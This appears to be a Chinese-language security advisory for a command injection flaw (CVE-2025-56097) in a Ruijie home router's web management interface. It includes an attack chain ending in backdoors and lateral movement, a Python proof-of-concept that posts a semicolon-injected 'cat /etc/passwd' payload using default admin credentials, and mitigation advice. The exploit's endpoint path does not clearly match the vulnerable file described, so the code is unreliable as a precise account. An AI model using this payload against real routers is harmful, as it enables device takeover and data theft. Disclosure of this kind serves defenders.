CVE-2025-56097 锐捷RG-EW1800GX PRO操作系统命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-56097

漏洞类型

操作系统命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ruijie RG-EW1800GX PRO (B11P226_EW1800GX-PRO_10223117)

漏洞概述

CVE-2025-56097是一个影响锐捷网络RG-EW1800GX PRO路由器的高危操作系统命令注入漏洞。该漏洞存在于设备的Web管理界面中，具体位于/usr/local/lua/dev_config/config_retain.lua文件的module_set功能模块。攻击者可以通过向该模块发送精心构造的POST请求，在设备上注入并执行任意操作系统命令。由于该漏洞的CVSS评分达到8.8分，属于高危级别，且攻击向量为网络攻击，低权限用户即可利用，无需用户交互，因此对受影响设备构成严重安全威胁。攻击成功后将获得设备的完全控制权，攻击者可以读取敏感配置信息、修改系统设置、安装后门程序或进一步横向渗透到内网其他设备。此漏洞影响使用特定固件版本的RG-EW1800GX PRO路由器，锐捷网络已在2025年12月11日披露此漏洞并提供修复方案。鉴于该漏洞已被公开披露且PoC代码已发布，建议用户立即采取修复措施以防止潜在的安全事件。

技术细节

该漏洞为典型的操作系统命令注入（OS Command Injection）漏洞，存在于Ruijie RG-EW1800GX PRO路由器的Lua脚本模块中。具体位置在/usr/local/lua/dev_config/config_retain.lua文件的module_set处理函数。漏洞根源在于该函数对用户输入的参数未进行充分的输入验证和命令隔离，直接将用户可控的参数拼接到系统命令中执行。攻击者可以在POST请求的参数中注入分号、管道符、&&、||等Shell命令分隔符，以及恶意命令字符串。由于设备以root权限运行Web服务，注入的命令将以最高权限执行。漏洞利用过程相对简单，攻击者只需构造包含恶意命令的POST请求发送到/module_set端点，即可实现命令执行。成功利用后，攻击者可以执行任意系统命令，包括读取/etc/passwd和/etc/shadow文件、添加SSH公钥、安装netcat后门等操作。该漏洞的认证要求为低权限，表明普通用户账号即可触发漏洞，进一步降低了攻击门槛。

攻击链分析

STEP 1

步骤1

扫描发现运行存在漏洞固件版本的Ruijie RG-EW1800GX PRO路由器

STEP 2

步骤2

获取设备管理员或低权限用户凭证（默认凭证或通过其他漏洞获取）

STEP 3

步骤3

构造包含命令注入payload的POST请求，目标是/module_set端点

STEP 4

步骤4

在module_set参数中注入恶意命令，如分号分隔符后跟系统命令

STEP 5

步骤5

发送恶意请求到/usr/local/lua/dev_config/config_retain.lua脚本

STEP 6

步骤6

漏洞脚本未过滤用户输入，直接将注入的命令拼接到系统命令中执行

STEP 7

步骤7

以root权限执行注入的任意系统命令，完全控制设备

STEP 8

步骤8

部署持久化后门、窃取敏感数据或横向移动到内网其他设备

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-56097 PoC - Ruijie RG-EW1800GX PRO Command Injection
# Target: /usr/local/lua/dev_config/config_retain.lua module_set endpoint

target = sys.argv[1] if len(sys.argv) > 1 else 'http://192.168.1.1'

# Construct malicious POST request with command injection payload
url = f"{target}/cgi-bin/luci/api/module_set"

# Command injection via module_set parameter
# Inject: cat /etc/passwd to verify command execution
payload = {
    'module': 'config_retain',
    'action': 'set',
    'data': 'test;cat /etc/passwd;'  # Command injection payload
}

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Authorization': 'Basic YWRtaW46YWRtaW4='  # Base64 encoded admin:admin
}

try:
    print(f"[*] Sending exploit to {url}")
    print(f"[*] Payload: {payload}")
    response = requests.post(url, data=payload, headers=headers, timeout=10)
    print(f"[*] Response Status: {response.status_code}")
    print(f"[*] Response Body:\n{response.text}")
except requests.exceptions.RequestException as e:
    print(f"[!] Error: {e}")

影响范围

Ruijie RG-EW1800GX PRO B11P226_EW1800GX-PRO_10223117

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：首先，禁用路由器的WAN口远程管理功能，仅允许通过LAN口本地访问管理界面；其次，立即修改所有默认用户名和密码，使用强密码并定期更换；第三，在网络层面实施访问控制，仅允许受信任的IP地址访问路由器的管理接口；第四，监控设备日志，关注异常的POST请求和命令执行行为；最后，考虑使用VPN建立安全的管理通道，避免将管理界面直接暴露在公网上。